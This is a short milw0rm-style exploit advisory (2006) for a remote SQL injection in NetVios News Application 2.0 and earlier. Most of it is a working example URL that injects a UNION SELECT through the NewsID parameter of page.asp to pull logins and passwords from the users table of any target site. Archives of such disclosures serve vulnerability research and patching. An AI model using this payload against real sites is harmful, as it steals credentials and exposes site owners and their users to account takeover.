******************************************************************************* # Title : NetVios <= 2.0 [News Application] (page.asp) Remote SQL Injection Vulnerability # Author : ajann ******************************************************************************* ###http://[target]/[path]//page.asp?NewsID=[SQL] Example: //page.asp?NewsID=-1%20union%20select%200,0,0,logins,password,0,0,0%20from%20users%20where%20userid%20like%201 """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2006-11-14]